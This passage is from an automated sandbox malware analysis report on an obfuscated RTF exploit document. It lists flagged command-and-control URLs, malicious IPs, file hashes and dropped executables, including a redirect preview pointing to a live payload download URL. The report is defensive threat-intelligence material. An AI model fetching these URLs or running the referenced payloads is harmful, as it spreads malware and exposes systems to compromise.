                                http://www.alishopogolic.com/t2ti/www.maquibotanic.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.guimisha.comReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.356321404.0000000007968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.0000000007997000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.000000000795D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354623320.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.356321404.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.allamericanshuttlellc.com/t2ti/www.shucaimh.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.www32561b.comReferer:explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://support.mozilla.orgexplorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.michealwilshire.online/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • 2%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.ssongg10292.cfd/t2ti/explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • 2%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.alishopogolic.comexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fxzx01.icuexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.ssongg10292.cfd/t2ti/www.hhmhhhbh.xyzexplorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        103.150.181.71
                                        		www.xazeyu.netunknown
                                        		138538NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCNtrue
                                        3.33.130.190
                                        		6061k.vipUnited States
                                        		8987AMAZONEXPANSIONGBtrue
                                        107.164.111.101
                                        		www.shucaimh.comUnited States
                                        		18779EGIHOSTINGUStrue
                                        103.224.247.210
                                        		swamini.inIndia
                                        		133295WEBWERKS-ASWebWerksIndiaPvtLtdINtrue

                                        General Information

                                        Joe Sandbox Version:38.0.0 Ammolite
                                        Analysis ID:1345774
                                        Start date and time:2023-11-21 13:25:07 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 9m 53s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:16
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winRTF@429/12@5/4
                                        EGA Information:
                                        • Successful, ratio: 83.3%
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 137
                                        • Number of non-executed functions: 159
                                        Cookbook Comments:
                                        • Found application associated with file extension: .rtf
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Active ActiveX Object
                                        • Scroll down
                                        • Close Viewer
                                        • Override analysis time to 80123.9603681394 for current running targets taking high CPU consumption
                                        • Override analysis time to 160247.920736279 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 8.249.223.254, 8.249.225.254, 8.252.65.254, 8.252.81.126, 8.249.243.254, 72.21.81.240
                                        • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 1668 because there are no executed function
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        13:25:52API Interceptor360x Sleep call for process: EQNEDT32.EXE modified
                                        13:25:58API Interceptor29x Sleep call for process: twbcaze.exe modified
                                        13:26:00API Interceptor684884x Sleep call for process: explorer.exe modified
                                        13:26:03API Interceptor12281021x Sleep call for process: cmstp.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        103.150.181.71FAT_-_0035.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.weixinrobots.com/b0y4/?mDKDR=5jOtvl80J6pPfLo&bV2=iWzdtdOUr3WyESEtDtxmXiSYMZp4K2MhDFOUgWW4Xkn4P0jVRWhckfA3XwpZsOG/LFi3
                                        3.33.130.190Confirma.exeGet hashmaliciousFormBookBrowse
                                        • www.canadiantrafficmanagement.net/he2a/?c6Z=q6al5R7x&9rIdTlI=8QFQCqD9FRlMZfde71PklYjLEob+si+Y9aKcIwfPHn9Ij3TA880ZABCw2tr5vOD0Poxe
                                        Nuevo_orden_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.awra.app/m0d5/?3f2t_LnX=hiUfbT9yhpJi+bcQh0jRPY3Wl7eZj/T4te/gMgaWTw1FmjvAcJpk9Hnme9R0LWkJMCKRHAomNg==&cp=YPMlNpnpz
                                        Payment_$5,860.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.truepanthersecurity.info/st58/?Cj=fAqS/1aKGrYljxpbu4X6H2aQdB0I7R8hcCOST+4zDPZSvo6QLnJC4z9ezIabo8sXkPtY&Kzr=lHF49jH
                                        PO#11231270.docGet hashmaliciousFormBookBrowse
                                        • www.elohiyminfotech.com/pui9/?Ftx=GcObd50+d4jDDNbr1PdCqLXjzhg6LOLbb5/IEp8vuKpL/fluFMlT9AyGIQfRapZ3d1HsnQ==&pFQtB=grvhL8lhxXPp
                                        ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.vastfew.com/ay62/?N2MpwJo=GeKgvGHevWBAn+maQ59oXcZbLyVfsEOAUsIdsvGlzObY1CA72B+o44RVxGxsyTu8sw9Z&NN90b=nXLdQB9p1nAdvbPp
                                        9008654324456.exeGet hashmaliciousFormBookBrowse
                                        • www.thelakahealth.com/ao65/?DlS=gX6nrNea7JPxmwviOkA4KSw4hGBEIcWikOJPOCdqHMmRSxLokgSfXw86lphfVMxxzfue&P2J=0nMX8h7
                                        cRmu9LROM09hq1F.exeGet hashmaliciousFormBookBrowse
                                        • www.mrsearthphilippines.com/fadc/?ArQ=xR8gpuhlPV8SDnMF1EpA5rnikjCsmPdm8o8xgOC599NS+umfnF8dhOErF6UDZFfmUFFp&-Zv=ahuD9pip12jLJXo
                                        RFQ-T56797W_1.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.centralngs.com/ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41
                                        Confirmation!!.exeGet hashmaliciousFormBookBrowse
                                        • www.canadiantrafficmanagement.net/he2a/?9rNP-n=8QFQCqCJFxg8EvAqnFPklYjLEob+si+Y9aKcIwfPHn9Ij3TA880ZABCw2t/T6eD3N/xe&2d=K8oTebaH
                                        Order_QR-00658.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.riseupwithpaiges.com/st58/?uX=lf5X&TxlL=gUKQ65KeJ5i7Ce2D3FiDlp1E3fkwW/hcbnBIeh92PGVXj7fPNwEFLJ29uF5Ndq/xYSnYssLNHA==
                                        1451__TrogeShippingSchedule.docGet hashmaliciousFormBookBrowse
                                        • www.medicalspacelocators.com/fs35/?dv24o=sRK8IkSfsErkPQnlPbO1qZyUPsbwAj+otqHi7ZjosrRYcrfc1O7jF7WWLGWHv2HvZcy8OA==&NtPHFj=MrAxW
                                        wM34vVyJ6k.exeGet hashmaliciousFormBookBrowse
                                        • www.natsellsatl.com/bp31/
                                        Quotation.xlsGet hashmaliciousFormBookBrowse
                                        • www.lynktag.com/bp31/
                                        THP-20381508-2023NP.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.truepanthersecurity.info/st58/?vT=fAqS/1aKGrYljxpbu4X6H2aQdB0I7R8hcCOST+4zDPZSvo6QLnJC4z9ezIaikdAU1fMf&S2M8J8=RdEHspH0oFo8
                                        Invoice_&_Banking_details.exeGet hashmaliciousFormBookBrowse
                                        • www.teambaddiesent.com/o11y/?Jv1=ZVU+TFHYC94w20+VuauFbc5mAHki4wXr17NQhqU5+T20CS96TKuoHk4ArrdfPppLZitG&I6k=4hIxBFAhePdLi
                                        Factura_de_proforma_pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                        • www.vivanenergy.com/ed09/?Unj=NcWzkpVrfNqMm41eN7UpMV1Z1pj7g082Ul7Kosu7yp8Tgq2wSTWTECFhfFgJ/Aytv/Qg&UR-4=D8OtmpYpTP
                                        Receipt_91888_PDF.exeGet hashmaliciousFormBookBrowse
                                        • www.misstamar.mobi/he2a/?Ej=+ndrpoqJBkrx/AVrk4daYrXANuq9Wk84J7BJkdqIrMZVv9dYaOHvLvMiox9ALFSPbd/T&ohPd=S8q0RfV
                                        BB879OMOJHH.exeGet hashmaliciousFormBookBrowse
                                        • www.misstamar.mobi/he2a/?wVM=+ndrpoqJBkrx/AVrk4daYrXANuq9Wk84J7BJkdqIrMZVv9dYaOHvLvMioxpPQw2xcv7e&lXN=O0GHFhn0BPplp
                                        Confirmation_receipt_PDF.exeGet hashmaliciousFormBookBrowse
                                        • www.misstamar.mobi/he2a/?nN=8pNTU&Bpg=+ndrpoqJBkrx/AVrk4daYrXANuq9Wk84J7BJkdqIrMZVv9dYaOHvLvMioyFpXxKJROaF7QcPCA==
                                        svcVJ3Ljwp.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • www.fakeittilyoumakeitfinance.com/ge06/?Lv6d=LPwSOSBVc8ythlOnIQFj4MKZD6dv3TVhpdJLV6eyESk7PzOWXbKoEYS1k0BoAfdBpGEk&VPK0i=xN9LEhVxD

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        swamini.inNEWREST_Procurement.xlsxGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        sYfKrBVpjn.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 103.224.247.210
                                        Quote_EXW..xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 103.224.247.210
                                        Oder_S65392.xlsxGet hashmaliciousAgentTesla, NSISDropperBrowse
                                        • 103.224.247.210
                                        COFCO-INV231122_Balancepaymentnotice.docGet hashmaliciousAveMaria, UACMeBrowse
                                        • 103.224.247.210
                                        TN81804BM_Production.docGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 103.224.247.210
                                        Inquiry-IND23072113.docGet hashmaliciousAgentTeslaBrowse
                                        • 103.224.247.210
                                        310036_for_Production_Requirement.docGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 103.224.247.210

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        EGIHOSTINGUSIqgbhvnaowuspb.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                        • 104.164.179.89
                                        SecuriteInfo.com.Win32.PWSX-gen.31207.26757.exeGet hashmaliciousFormBookBrowse
                                        • 104.164.179.89
                                        G1vp1p1HjW.elfGet hashmaliciousMiraiBrowse
                                        • 142.253.14.166
                                        GiRCyG58ws.elfGet hashmaliciousMiraiBrowse
                                        • 205.164.20.225
                                        xpQJmpNCvU.elfGet hashmaliciousUnknownBrowse
                                        • 142.111.153.23
                                        Faktura_proformasi.exeGet hashmaliciousFormBookBrowse
                                        • 104.164.179.89
                                        9008654324456.exeGet hashmaliciousFormBookBrowse
                                        • 172.120.78.81
                                        m2cI5nJYUI.exeGet hashmaliciousAmadey, Phonk Miner, RedLine, SectopRAT, zgRATBrowse
                                        • 192.177.75.157
                                        skid.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 172.120.223.194
                                        eKlJmvs8k7.exeGet hashmaliciousFormBookBrowse
                                        • 104.253.249.45
                                        Confirmarea_comenzii.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                        • 104.164.179.35
                                        SrGKzf5pYf.exeGet hashmaliciousFormBookBrowse
                                        • 104.164.69.183
                                        1u31ptQsf6.elfGet hashmaliciousOkiruBrowse
                                        • 107.187.182.30
                                        SecuriteInfo.com.Win32.TrojanX-gen.27173.29057.exeGet hashmaliciousUnknownBrowse
                                        • 23.230.0.173
                                        SecuriteInfo.com.Win32.TrojanX-gen.27173.29057.exeGet hashmaliciousUnknownBrowse
                                        • 23.230.0.173
                                        bHFZDHNHZw.elfGet hashmaliciousMiraiBrowse
                                        • 45.39.143.28
                                        JLavGK0bZb.exeGet hashmaliciousFormBookBrowse
                                        • 104.164.141.70
                                        JndPQJ5g1P.elfGet hashmaliciousUnknownBrowse
                                        • 172.121.77.102
                                        arm7.elfGet hashmaliciousMiraiBrowse
                                        • 166.93.117.92
                                        xd.x86.elfGet hashmaliciousMiraiBrowse
                                        • 107.165.1.151
                                        NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCNsora.x86.elfGet hashmaliciousMiraiBrowse
                                        • 103.133.185.146
                                        sora.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 103.133.185.134
                                        a0JDLTs0LS.elfGet hashmaliciousMirai, RapperBotBrowse
                                        • 103.133.185.145
                                        FAT_-_0035.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 103.150.181.71
                                        uMcp66r8xm.elfGet hashmaliciousMiraiBrowse
                                        • 103.99.44.7
                                        jinx.arm7.elfGet hashmaliciousUnknownBrowse
                                        • 103.140.228.51
                                        elasqyvohu.exeGet hashmaliciousUnknownBrowse
                                        • 103.150.181.176
                                        MZbxLJqYM3.elfGet hashmaliciousMiraiBrowse
                                        • 103.133.185.156
                                        B8BuahzlPUGet hashmaliciousMiraiBrowse
                                        • 103.133.185.145
                                        V1yRZzzjuJGet hashmaliciousUnknownBrowse
                                        • 103.133.185.151
                                        QRJCdtkHy6Get hashmaliciousMiraiBrowse
                                        • 103.133.185.115
                                        eBEMdu87IGGet hashmaliciousMiraiBrowse
                                        • 103.133.185.144
                                        vLqyyo55oAGet hashmaliciousGafgyt MiraiBrowse
                                        • 103.133.185.142
                                        ORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exeGet hashmaliciousFormBookBrowse
                                        • 103.113.95.99
                                        VHWXOeJWKFGet hashmaliciousMiraiBrowse
                                        • 103.133.185.119
                                        sq9aBtcak6.exeGet hashmaliciousFormBookBrowse
                                        • 103.145.39.195
                                        mixazed.exeGet hashmaliciousGoBrutBrowse
                                        • 103.113.92.10
                                        AMAZONEXPANSIONGBConfirma.exeGet hashmaliciousFormBookBrowse
                                        • 3.33.130.190
                                        Nuevo_orden_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 3.33.130.190
                                        Payment_$5,860.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 3.33.130.190
                                        PO#11231270.docGet hashmaliciousFormBookBrowse
                                        • 3.33.130.190
                                        https://rjtlawfirm.sharefile.com/d-3e8cb5040ece40a0Get hashmaliciousHTMLPhisherBrowse
                                        • 3.33.222.159
                                        https://att-yahoo-107847.weeblysite.com/Get hashmaliciousUnknownBrowse
                                        • 3.33.220.150
                                        https://rjtlawfirm.sharefile.com/d-9543a8d6e3f84dafGet hashmaliciousHTMLPhisherBrowse
                                        • 3.33.222.159
                                        https://rjtlawfirm.sharefile.com/share/view/4e7ac2a69d944a41Get hashmaliciousHTMLPhisherBrowse
                                        • 3.33.222.159
                                        http://www.asercol.com/Get hashmaliciousUnknownBrowse
                                        • 52.223.34.155
                                        G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
                                        • 3.33.130.190
                                        http://usps.uspsbp.com/Get hashmaliciousUnknownBrowse
                                        • 3.33.220.150
                                        http://ky-df3.comGet hashmaliciousUnknownBrowse
                                        • 3.33.130.190
                                        ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 3.33.130.190
                                        https://att-108191.weeblysite.com/Get hashmaliciousUnknownBrowse
                                        • 52.223.40.198
                                        https://znxbamdkwjcbas2562.top/Get hashmaliciousHTMLPhisherBrowse
                                        • 52.223.22.214
                                        https://att-100016.weeblysite.com/Get hashmaliciousUnknownBrowse
                                        • 52.223.40.198
                                        https://pitch.com/v/JW-Behavioral-Center-Project-Bid-Document-s8xcr7Get hashmaliciousHTMLPhisherBrowse
                                        • 3.33.152.127
                                        https://simpledialogue.net/captch/homesi/net/login.phpGet hashmaliciousUnknownBrowse
                                        • 52.223.40.198
                                        https://att-108191.weeblysite.com/Get hashmaliciousUnknownBrowse
                                        • 3.33.220.150
                                        https://rebrand.ly/hyjsfgxGet hashmaliciousUnknownBrowse
                                        • 3.33.143.57

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        7dcce5b76c8b17472d024758970a406bNEWREST_Procurement.xlsxGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        DOCUMENTOVIEW_FACTURAEXPRESS_ESCANEAD_PDFN3D0L3BG5D.exeGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        sYfKrBVpjn.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 103.224.247.210
                                        Quote_EXW..xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                        • 103.224.247.210
                                        SecuriteInfo.com.Script.SNH-gen.12817.4151.docxGet hashmaliciousQuasarBrowse
                                        • 103.224.247.210
                                        Oder_S65392.xlsxGet hashmaliciousAgentTesla, NSISDropperBrowse
                                        • 103.224.247.210
                                        misure.exeGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        Reserva_Detalhes.ppamGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        Reserva_Detalhes.ppamGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        d#U044f.docxGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        Order_Contract_8657645.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        approval_order_PO.docx.docGet hashmaliciousRemcosBrowse
                                        • 103.224.247.210
                                        Doc606112.xlsGet hashmaliciousAgentTeslaBrowse
                                        • 103.224.247.210
                                        Reserva.ppamGet hashmaliciousRevengeRATBrowse
                                        • 103.224.247.210
                                        Label-4800014530.docx.docGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        Reserva_Cancelar.ppamGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        Reserva_Cancelar.ppamGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        ship.jsGet hashmaliciousUnknownBrowse
                                        • 103.224.247.210
                                        Reserva_Detalhes.ppamGet hashmaliciousRevengeRATBrowse
                                        • 103.224.247.210
                                        RESERVA.ppamGet hashmaliciousRevengeRATBrowse
                                        • 103.224.247.210

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\balokarat2.1[1].htm

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:HTML document, ASCII text
                                        Category:dropped
                                        Size (bytes):194
                                        Entropy (8bit):4.913737935545676
                                        Encrypted:false
                                        SSDEEP:6:AYSI0MXLxu2CAIuh7FUPMd3AZmpGWoEwM:zSabxiAIkBUP90pToa
                                        MD5:9F9D2481859AE4D1911AB9E558F07508
                                        SHA1:32A08519726621BC8669247E4ED809077C833AB7
                                        SHA-256:A11631564799E17C365DE2A5A880B6D0F18153134014A5EDA5B71CC625046676
                                        SHA-512:62B0800A12FC95DE3C68484DBC26C7E87D6FE9CBD836463B331A8EF6A4A133DADCFC6C2012E676DC45DA65087F2ACB9BFC75E7027931890C331294695A3C8995
                                        Malicious:false
                                        Reputation:low
                                        Preview:<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe">here</a></body>

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\balokarat2.1[1].exe

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):345522
                                        Entropy (8bit):7.70573760188668
                                        Encrypted:false
                                        SSDEEP:6144:xBlL/8qFeJ/1IW4/DTgYKfHSAtiHbc2+x/D2LYTx0/BRtLuL3SqSY5dQVxS:X2qFWdIWQTgY2HSkiHbc2+5DLTKcxX
                                        MD5:B08C02AB269D1406728178E62017C3D4
                                        SHA1:DA33C4A1A8912C7D08CFB1BF77C59A813419BA64
                                        SHA-256:4169BC8EF83D44E5CD72DE2F88C40602F7840D578E1EC0BBDD9B2A874BB75C4C
                                        SHA-512:36516AB0FD27708F38CCEEBDE3AB532D3CAF57598D907A565828ABF999C7D798F5EA02CF99D6EC1F9A142158A22D7BF794D91221E68ED27965C6B509292C64CC
                                        Malicious:true
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................P...............................................t...........q...........................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc....q.......r...x..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0D330375-5D52-4CE9-AF5C-85661FFB8049}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:CE338FE6899778AACFC28414F2D9498B
                                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{549C67C8-FC54-4D4D-BB29-D3A79D220C79}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A1C61DD4-6598-4E95-AD1C-193CE4549D36}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):1.0862650957458768
                                        Encrypted:false
                                        SSDEEP:6:sx+6Mulwc5NgREqAWlgFJAQDlll8vlwijlFwQFrB:4+5ulFk5uFJ/7uvqkKQZB
                                        MD5:130E0F23E1E679727C6E794A98DFEBB7
                                        SHA1:C9D85B40BA3CC2211F43DBF5A6214D71D46F3EDC
                                        SHA-256:A5B0749FF44E1BDBB14A8C60A2F2184C6EAA99CF1F6234A9C39E5A250A654A3C
                                        SHA-512:D46976FEBEEFF47CD35AF9228B9B025C893F386A686FABE0F6E33259F50C8425E897F874A11969428569BAD70CFD3F273DF2F22F84DD27A83599FCB39C16C1F5
                                        Malicious:false
                                        Preview:................9.6.6.2.0.7.8.1.4.3.7.4.4.1.4.9.3.0.7.3.5.5.2.3.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...........................................................................................................................................................................................................................................................................................................................................................................................................................B...D...J...............................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j`..i...CJ..OJ..QJ..U..^J..aJ.

                                        C:\Users\user\AppData\Local\Temp\twbcaze.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):203776
                                        Entropy (8bit):6.346026797085734
                                        Encrypted:false
                                        SSDEEP:3072:EzV7OxQ1rAQChXoFwC6B83WvMgn3vAdtFJ1XjUQztpwWDWwmL7hQmFX565/GIXrC:EzVUQVshXo+9ASSTUQxSwYmmFJcro5
                                        MD5:9C416E56B341D900E2DFEC7595CC85EE
                                        SHA1:50036AC5E3AE4698945D9D979A5533EF48D344ED
                                        SHA-256:38E786FFD9E88C04DB2DADA4C569C07CBEAF2684FEAC986EC833A6C97EF12CF3
                                        SHA-512:1DB2C03E7261A05FF0513F92B94C808B32C66D9F01C8975544E494ACB2ECC33CA399844086916B8C87E73D24B1CBD9995F79B19DE320CC51627BF58667E7922E
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....\e.................L........................@..........................p.......................................................................................................................s...............................................text...pK.......L.................. ..`.rdata.......`.......P..............@..@.data...\4.......(..................@....00cfg.......@......................@..@.tls.........P......................@....voltbl.j....`..................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\vieaa.phf

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):210425
